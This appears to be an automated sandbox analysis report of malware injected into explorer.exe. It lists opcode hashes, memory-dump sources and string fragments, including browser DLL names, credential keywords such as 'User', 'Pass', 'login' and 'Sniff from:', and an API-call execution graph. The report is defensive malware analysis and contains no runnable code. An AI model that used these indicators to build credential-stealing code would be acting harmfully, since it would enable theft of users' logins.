                                                          • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                          • Instruction ID: 8ab2bd8419b552ed1fa72578210b69d314ecc8503529bccaf5d1de2482315f64
                                                          • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                          • Instruction Fuzzy Hash: 3AC16A74618B098FC758EF68C486BEAF3E1FBA4304F40462EA59AC7240DF34E515CB86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                          • API String ID: 0-97273177
                                                          • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                          • Instruction ID: f32558ce97c2708036d163963a8e7f0f78f4e3e6f808e1c13440e1d0de69c003
                                                          • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                          • Instruction Fuzzy Hash: 0B51B3345187488FD709DF18C5813AAB7E5FB95704F501A2EE8CBC7242DBB8E906CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                          • API String ID: 0-639201278
                                                          • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                          • Instruction ID: e9df93e3576619393a5380814c8fb8b8476fbc48c36dc67d7871074e538fcbc6
                                                          • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                          • Instruction Fuzzy Hash: 98C18075618A194FC748EF68D596BAAB3E1FBB4304F814329944AC7250DF34EA42CB85
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                          • API String ID: 0-639201278
                                                          • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                          • Instruction ID: e353be3562122d3681f338c6820e6ff8d587e0c1b4cee74a52967d57932c4627
                                                          • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                          • Instruction Fuzzy Hash: 2CC18074618A194FC748EF68D596BAAF3E1FBB8304F914329944EC7250DF34EA42CB85
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: UR$2$L: $Pass$User$name$word
                                                          • API String ID: 0-2058692283
                                                          • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                          • Instruction ID: 7a66efc70f733f4247cb9eaed025fa7dd41d31f0c08f17d8eb30643fc1dc35e6
                                                          • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                          • Instruction Fuzzy Hash: CFA1CD30618B488BDB19DFA8D544BEEB7E1FFA8300F00462DE48AD7251EF74E9558789
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: UR$2$L: $Pass$User$name$word
                                                          • API String ID: 0-2058692283
                                                          • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                          • Instruction ID: 97ea3575370895f47e5af7233fbe90cad1250698a0be6916561af16b291b7cf1
                                                          • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                          • Instruction Fuzzy Hash: BF91AE706187488BDB19DFA8D544BEEB7E1FBA8300F00462EE48AD7241EF74E5558789
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $.$e$n$v
                                                          • API String ID: 0-1849617553
                                                          • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                          • Instruction ID: 66502525fbc2618906d275432ab0625bbcdb7677a468aa5d3746987debe51b29
                                                          • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                          • Instruction Fuzzy Hash: E871C435618B498FD758DFA8C4857AAB7F0FF68304F10062EE44AC7261EF75E9468B81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 2.dl$dll$l32.$ole3$shel
                                                          • API String ID: 0-1970020201
                                                          • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                          • Instruction ID: 2815acaaa1cc4c046ea6627f36db6091373865de4572dad6ceb3b9c715bcb4a0
                                                          • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                          • Instruction Fuzzy Hash: 2C514DB0914B4C8BDB55DFA8C045BEAB7F1FF68300F40462EE59AE7254EF34A5418B89
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4$\$dll$ion.$vers
                                                          • API String ID: 0-1610437797
                                                          • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                          • Instruction ID: 3fe5907ce32be459367c0857befb4356ced9d9b89a322036f53e3c40788bf0b5
                                                          • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                          • Instruction Fuzzy Hash: 79418334218B8C8FDBA5EF6499457EA77E0FBA4341F51462E944EC7240EF34D9058782
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 32.d$cli.$dll$sspi$user
                                                          • API String ID: 0-327345718
                                                          • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                          • Instruction ID: d7bc18bf87e9d8fe1bdaa8494e91040f0c147294416dac9c63af961696578dae
                                                          • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                          • Instruction Fuzzy Hash: 2B417C70A58E0D8FCB94EF6882957AE77E1FB78341F41416AA80ED7200DE38D941CB86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .dll$el32$h$kern
                                                          • API String ID: 0-4264704552
                                                          • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                          • Instruction ID: e275fa72e8c04abead0bd14cbc0a524de9565a8e12b609883848a2d529e08e08
                                                          • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                          • Instruction Fuzzy Hash: F8418F70608B4D8FD7A9DF6881943ABB7E1FBA8300F104A2ED49EC3655DB74D945CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $Snif$f fr$om:
                                                          • API String ID: 0-3434893486
                                                          • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                          • Instruction ID: 0d64eb6cd4550a19e958efe70311137c264c4947c6d81c6de2da29ce7c80805b
                                                          • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                          • Instruction Fuzzy Hash: DB31E33150CB885FC71ADB28C1897EAB7D4FBA4300F50491EE49BC7252EE34E54ACB42
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $Snif$f fr$om:
                                                          • API String ID: 0-3434893486
                                                          • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                          • Instruction ID: c14914975258ed8ac49d5b1d5619c8047aa17223d1b7c5310e5b16c879cad1e2
                                                          • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                          • Instruction Fuzzy Hash: D031F271508B486FD719DB28C5897EAB7D5FBB4300F40491EE49BC3292EE34E506CA83
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .dll$chro$hild$me_c
                                                          • API String ID: 0-3136806129
                                                          • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                          • Instruction ID: 907352160b6c90173a56614dc9b2840e540a0c0a7181228c6c496ccfd92f6bd2
                                                          • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                          • Instruction Fuzzy Hash: B2318E34118B484FC784EF688595BAAB7E1FFB8300F84462DA44ECB215DF34E945C796
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .dll$chro$hild$me_c
                                                          • API String ID: 0-3136806129
                                                          • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                          • Instruction ID: 821941cb494ba08fa6c253c7df94506fc1343821f760894afbbbbe2f2fbc58d6
                                                          • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                          • Instruction Fuzzy Hash: 3D31AE34218B488FC784DF688595BAAB7E1FFB8300F84463DA44ACB255DF34D946CB86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                          • API String ID: 0-319646191
                                                          • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                          • Instruction ID: 32aa2967e9f8a1d99271585c94906372948ce3665a37d67cc912671f07f5e0a4
                                                          • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                          • Instruction Fuzzy Hash: 7231D131614A0C8BCB44EFA8C8857EEBBE0FB68214F40022AE44ED7240DE78DA45C799
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                          • API String ID: 0-319646191
                                                          • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                          • Instruction ID: 99dc46d31b704b5328cdc7824d6cd532b64d0bccc09fd10ba5c2eed570d0f84d
                                                          • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                          • Instruction Fuzzy Hash: 0B21D530A10A4C8BCB05EFA8C9457EDBBE0FF78204F40422AE45AD7240DF78D605C795
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .$l$l$t
                                                          • API String ID: 0-168566397
                                                          • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                          • Instruction ID: 54419edd33b458d067bd13cd180c2447077ae1313aa1378f18e69ab97c4aec5a
                                                          • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                          • Instruction Fuzzy Hash: 71216B74A24A0D9BDB48EFA8D1457EEBBF1FB28314F50462EE409D3600DB78E595CB84
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .$l$l$t
                                                          • API String ID: 0-168566397
                                                          • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                          • Instruction ID: 8d9f2078d6e7a16b4dc4d3ed6d6ce16d9d108ac2d235cdd5066bb8aee91bce6e
                                                          • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                          • Instruction Fuzzy Hash: E2217C74A24A0D9BDB44EFA8C0457AEBAF0FB28314F50462EE009D3600DB78E591CB84
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: auth$logi$pass$user
                                                          • API String ID: 0-2393853802
                                                          • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                          • Instruction ID: 90dfb7915e1446935f1aa765e7e5a207e28894a764e345e4ac889153b7164e24
                                                          • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                          • Instruction Fuzzy Hash: 3121CD30614B0D8BCB45CF9999817DEB7E6EF98344F004629E40AEB244D7B5E914CBC6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:1.6%
                                                          Dynamic/Decrypted Code Coverage:2%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:591
                                                          Total number of Limit Nodes:70
                                                          execution_graph 103403 4822ad0 LdrInitializeThunk 103407 25bf10d 103410 25bb9d0 103407->103410 103411 25bb9f6 103410->103411 103418 25a9d40 103411->103418 103413 25bba02 103414 25bba26 103413->103414 103426 25a8f30 103413->103426 103464 25ba6b0 103414->103464 103467 25a9c90 103418->103467 103420 25a9d4d 103421 25a9d54 103420->103421 103479 25a9c30 103420->103479 103421->103413 103427 25a8f57 103426->103427 103896 25ab1c0 103427->103896 103429 25a8f69 103900 25aaf10 103429->103900 103431 25a8f86 103439 25a8f8d 103431->103439 103971 25aae40 LdrLoadDll 103431->103971 103433 25a90f2 103433->103414 103435 25a8ffc 103916 25af410 103435->103916 103437 25a9006 103437->103433 103438 25bbf90 2 API calls 103437->103438 103440 25a902a 103438->103440 103439->103433 103904 25af380 103439->103904 103441 25bbf90 2 API calls 103440->103441 103442 25a903b 103441->103442 103443 25bbf90 2 API calls 103442->103443 103444 25a904c 103443->103444 103928 25aca90 103444->103928 103446 25a9059 103447 25b4a50 8 API calls 103446->103447 103448 25a9066 103447->103448 103449 25b4a50 8 API calls 103448->103449 103450 25a9077 103449->103450 103451 25a9084 103450->103451 103452 25a90a5 103450->103452 103938 25ad620 103451->103938 103454 25b4a50 8 API calls 103452->103454 103460 25a90c1 103454->103460 103457 25a90e9 103458 25a8d00 23 API calls 103457->103458 103458->103433 103459 25a9092 103954 25a8d00 103459->103954 103460->103457 103972 25ad6c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 103460->103972 103465 25baf60 LdrLoadDll 103464->103465 103466 25ba6cf 103465->103466 103498 25b8bc0 103467->103498 103471 25a9cb6 103471->103420 103472 25a9cac 103472->103471 103505 25bb2b0 103472->103505 103474 25a9cf3 103474->103471 103516 25a9ab0 103474->103516 103476 25a9d13 103522 25a9620 LdrLoadDll 103476->103522 103478 25a9d25 103478->103420 103871 25bb5a0 103479->103871 103482 25bb5a0 LdrLoadDll 103483 25a9c5b 103482->103483 103484 
25bb5a0 LdrLoadDll 103483->103484 103485 25a9c71 103484->103485 103486 25af180 103485->103486 103487 25af199 103486->103487 103879 25ab040 103487->103879 103489 25af1ac 103883 25ba1e0 103489->103883 103492 25a9d65 103492->103413 103494 25af1d2 103495 25af1fd 103494->103495 103889 25ba260 103494->103889 103497 25ba490 2 API calls 103495->103497 103497->103492 103499 25b8bcf 103498->103499 103523 25b4e50 103499->103523 103501 25a9ca3 103502 25b8a70 103501->103502 103529 25ba600 103502->103529 103506 25bb2c9 103505->103506 103536 25b4a50 103506->103536 103508 25bb2e1 103509 25bb2ea 103508->103509 103575 25bb0f0 103508->103575 103509->103474 103511 25bb2fe 103511->103509 103593 25b9f00 103511->103593 103849 25a7ea0 103516->103849 103518 25a9ad1 103518->103476 103519 25a9aca 103519->103518 103862 25a8160 103519->103862 103522->103478 103524 25b4e5e 103523->103524 103526 25b4e6a 103523->103526 103524->103526 103528 25b52d0 LdrLoadDll 103524->103528 103526->103501 103527 25b4fbc 103527->103501 103528->103527 103532 25baf60 103529->103532 103531 25b8a85 103531->103472 103533 25baf70 103532->103533 103534 25baf92 103532->103534 103535 25b4e50 LdrLoadDll 103533->103535 103534->103531 103535->103534 103537 25b4d85 103536->103537 103539 25b4a64 103536->103539 103537->103508 103539->103537 103601 25b9c50 103539->103601 103541 25b4b73 103661 25ba460 LdrLoadDll 103541->103661 103542 25b4b90 103604 25ba360 103542->103604 103545 25b4b7d 103545->103508 103546 25b4bb7 103547 25bbdc0 2 API calls 103546->103547 103549 25b4bc3 103547->103549 103548 25b4d49 103551 25ba490 2 API calls 103548->103551 103549->103545 103549->103548 103550 25b4d5f 103549->103550 103555 25b4c52 103549->103555 103670 25b4790 LdrLoadDll NtReadFile NtClose 103550->103670 103552 25b4d50 103551->103552 103552->103508 103554 25b4d72 103554->103508 103556 25b4cb9 103555->103556 103558 25b4c61 103555->103558 103556->103548 103557 25b4ccc 103556->103557 103663 25ba2e0 103557->103663 103560 25b4c7a 103558->103560 103561 
25b4c66 103558->103561 103563 25b4c7f 103560->103563 103564 25b4c97 103560->103564 103662 25b4650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 103561->103662 103607 25b46f0 103563->103607 103564->103552 103619 25b4410 103564->103619 103566 25b4c70 103566->103508 103569 25b4d2c 103667 25ba490 103569->103667 103570 25b4c8d 103570->103508 103573 25b4caf 103573->103508 103574 25b4d38 103574->103508 103576 25bb101 103575->103576 103577 25bb113 103576->103577 103688 25bbd40 103576->103688 103577->103511 103579 25bb134 103691 25b4070 103579->103691 103581 25bb180 103581->103511 103582 25bb157 103582->103581 103583 25b4070 3 API calls 103582->103583 103586 25bb179 103583->103586 103585 25bb20a 103587 25bb21a 103585->103587 103817 25baf00 LdrLoadDll 103585->103817 103586->103581 103723 25b5390 103586->103723 103733 25bad70 103587->103733 103590 25bb248 103812 25b9ec0 103590->103812 103594 25baf60 LdrLoadDll 103593->103594 103595 25b9f1c 103594->103595 103843 4822c0a 103595->103843 103596 25b9f37 103598 25bbdc0 103596->103598 103846 25ba670 103598->103846 103600 25bb359 103600->103474 103602 25baf60 LdrLoadDll 103601->103602 103603 25b4b44 103602->103603 103603->103541 103603->103542 103603->103545 103605 25ba37c NtCreateFile 103604->103605 103606 25baf60 LdrLoadDll 103604->103606 103605->103546 103606->103605 103608 25b470c 103607->103608 103609 25ba2e0 LdrLoadDll 103608->103609 103610 25b472d 103609->103610 103611 25b4748 103610->103611 103612 25b4734 103610->103612 103614 25ba490 2 API calls 103611->103614 103613 25ba490 2 API calls 103612->103613 103616 25b473d 103613->103616 103615 25b4751 103614->103615 103671 25bbfd0 LdrLoadDll RtlAllocateHeap 103615->103671 103616->103570 103618 25b475c 103618->103570 103620 25b445b 103619->103620 103621 25b448e 103619->103621 103622 25ba2e0 LdrLoadDll 103620->103622 103623 25b45d9 103621->103623 103627 25b44aa 103621->103627 103624 25b4476 103622->103624 103625 25ba2e0 LdrLoadDll 103623->103625 103626 25ba490 2 API calls 
103624->103626 103631 25b45f4 103625->103631 103628 25b447f 103626->103628 103629 25ba2e0 LdrLoadDll 103627->103629 103628->103573 103630 25b44c5 103629->103630 103633 25b44cc 103630->103633 103634 25b44e1 103630->103634 103684 25ba320 LdrLoadDll 103631->103684 103636 25ba490 2 API calls 103633->103636 103637 25b44fc 103634->103637 103638 25b44e6 103634->103638 103635 25b462e 103640 25ba490 2 API calls 103635->103640 103641 25b44d5 103636->103641 103639 25b4501 103637->103639 103672 25bbf90 103637->103672 103642 25ba490 2 API calls 103638->103642 103644 25b4513 103639->103644 103675 25ba410 103639->103675 103645 25b4639 103640->103645 103641->103573 103643 25b44ef 103642->103643 103643->103573 103644->103573 103645->103573 103648 25b4567 103649 25b457e 103648->103649 103683 25ba2a0 LdrLoadDll 103648->103683 103650 25b459a 103649->103650 103651 25b4585 103649->103651 103654 25ba490 2 API calls 103650->103654 103653 25ba490 2 API calls 103651->103653 103653->103644 103655 25b45a3 103654->103655 103656 25b45cf 103655->103656 103678 25bbb90 103655->103678 103656->103573 103658 25b45ba 103659 25bbdc0 2 API calls 103658->103659 103660 25b45c3 103659->103660 103660->103573 103661->103545 103662->103566 103664 25baf60 LdrLoadDll 103663->103664 103665 25b4d14 103664->103665 103666 25ba320 LdrLoadDll 103665->103666 103666->103569 103668 25baf60 LdrLoadDll 103667->103668 103669 25ba4ac NtClose 103668->103669 103669->103574 103670->103554 103671->103618 103685 25ba630 103672->103685 103674 25bbfa8 103674->103639 103676 25baf60 LdrLoadDll 103675->103676 103677 25ba42c NtReadFile 103676->103677 103677->103648 103679 25bbb9d 103678->103679 103680 25bbbb4 103678->103680 103679->103680 103681 25bbf90 2 API calls 103679->103681 103680->103658 103682 25bbbcb 103681->103682 103682->103658 103683->103649 103684->103635 103686 25baf60 LdrLoadDll 103685->103686 103687 25ba64c RtlAllocateHeap 103686->103687 103687->103674 103818 25ba540 103688->103818 103690 25bbd6d 103690->103579 103692 
25b4081 103691->103692 103693 25b4089 103691->103693 103692->103582 103722 25b435c 103693->103722 103821 25bcf30 103693->103821 103695 25b40dd 103696 25bcf30 2 API calls 103695->103696 103701 25b40e8 103696->103701 103697 25b4136 103699 25bcf30 2 API calls 103697->103699 103704 25b414a 103699->103704 103701->103697 103829 25bcfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 103701->103829 103830 25bd060 103701->103830 103702 25b41a7 103703 25bcf30 2 API calls 103702->103703 103705 25b41bd 103703->103705 103704->103702 103706 25bd060 3 API calls 103704->103706 103707 25b41fa 103705->103707 103709 25bd060 3 API calls 103705->103709 103706->103704 103708 25bcf30 2 API calls 103707->103708 103710 25b4205 103708->103710 103709->103705 103711 25bd060 3 API calls 103710->103711 103718 25b423f 103710->103718 103711->103710 103714 25bcf90 2 API calls 103715 25b433e 103714->103715 103716 25bcf90 2 API calls 103715->103716 103717 25b4348 103716->103717 103719 25bcf90 2 API calls 103717->103719 103826 25bcf90 103718->103826 103720 25b4352 103719->103720 103721 25bcf90 2 API calls 103720->103721 103721->103722 103722->103582 103724 25b53a1 103723->103724 103725 25b4a50 8 API calls 103724->103725 103726 25b53b7 103725->103726 103727 25b53f2 103726->103727 103728 25b5405 103726->103728 103732 25b540a 103726->103732 103729 25bbdc0 2 API calls 103727->103729 103730 25bbdc0 2 API calls 103728->103730 103731 25b53f7 103729->103731 103730->103732 103731->103585 103732->103585 103836 25bac30 103733->103836 103736 25bac30 LdrLoadDll 103737 25bad8d 103736->103737 103738 25bac30 LdrLoadDll 103737->103738 103739 25bad96 103738->103739 103740 25bac30 LdrLoadDll 103739->103740 103741 25bad9f 103740->103741 103742 25bac30 LdrLoadDll 103741->103742 103743 25bada8 103742->103743 103744 25bac30 LdrLoadDll 103743->103744 103745 25badb1 103744->103745 103746 25bac30 LdrLoadDll 103745->103746 103747 25badbd 103746->103747 103748 25bac30 LdrLoadDll 103747->103748 103749 25badc6 103748->103749 103750 
